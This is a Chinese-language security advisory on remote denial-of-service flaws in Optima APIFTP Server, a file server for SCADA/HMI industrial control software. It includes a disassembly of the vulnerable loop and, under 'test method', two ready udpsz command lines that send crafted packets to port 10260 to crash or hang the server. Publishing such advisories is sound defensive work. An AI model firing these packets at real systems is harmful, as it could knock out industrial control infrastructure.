发布日期：2011-11-14
更新日期：2011-11-29

受影响系统：

optimalog Optima APIFTP Server <= 1.5.2.13

描述：

---

BUGTRAQ  ID: 50658
CVE(CAN) ID: CVE-2012-5048,CVE-2012-5049

Optima是一套通过SCADA/HMI界面控制PLC的自动软件。APIFTP Server是共享文件夹中的远程文件的文件服务器。

Optima APIFTP在实现上存在多个远程拒绝服务漏洞，攻击者可利用这些漏洞造成受影响应用程序崩溃或进入无限循环，拒绝服务合法用户。

1）通过超长的路径名称可利用空指针引用漏洞；

2）不完整报文可造成CPU的100%利用，导致无限循环：
  004A9C93   8B03             /MOV EAX,DWORD PTR DS:[EBX]
  004A9C95   8B80 78010000    |MOV EAX,DWORD PTR DS:[EAX+178]
  004A9C9B   2D B80B0000      |SUB EAX,0BB8     ; Switch (cases BB8..BE0)
  004A9CA0   74 19            |JE SHORT APIFTPSe.004A9CBB
  004A9CA2   83E8 14          |SUB EAX,14
  004A9CA5   74 47            |JE SHORT APIFTPSe.004A9CEE
  004A9CA7   83E8 0A          |SUB EAX,0A
  004A9CAA   0F84 9D000000    |JE APIFTPSe.004A9D4D
  004A9CB0   83E8 0A          |SUB EAX,0A
  004A9CB3   0F84 CA000000    |JE APIFTPSe.004A9D83
  004A9CB9  ^EB D8            |JMP SHORT APIFTPSe.004A9C93

<*来源：Luigi Auriemma （aluigi@pivx.com）
  
  链接：http://aluigi.altervista.org/adv/optimalog_1-adv.txt
        http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-332-03.pdf
        http://www.us-cert.gov/control_systems/pdf/ICSA-12-271-02.pdf
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://aluigi.org/testz/udpsz.zip

A]
  udpsz -C "e803 0400 ff" -T -D -3 -d SERVER 10260 0x107

  wait some seconds, the tool will quit automatically

B]
  udpsz -C "e803 0400 00" -T -D SERVER 10260 -1

建议：

---

厂商补丁：

optimalog
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.optimalog.com/home.html

浏览次数：2305
严重程度：0（网友投票）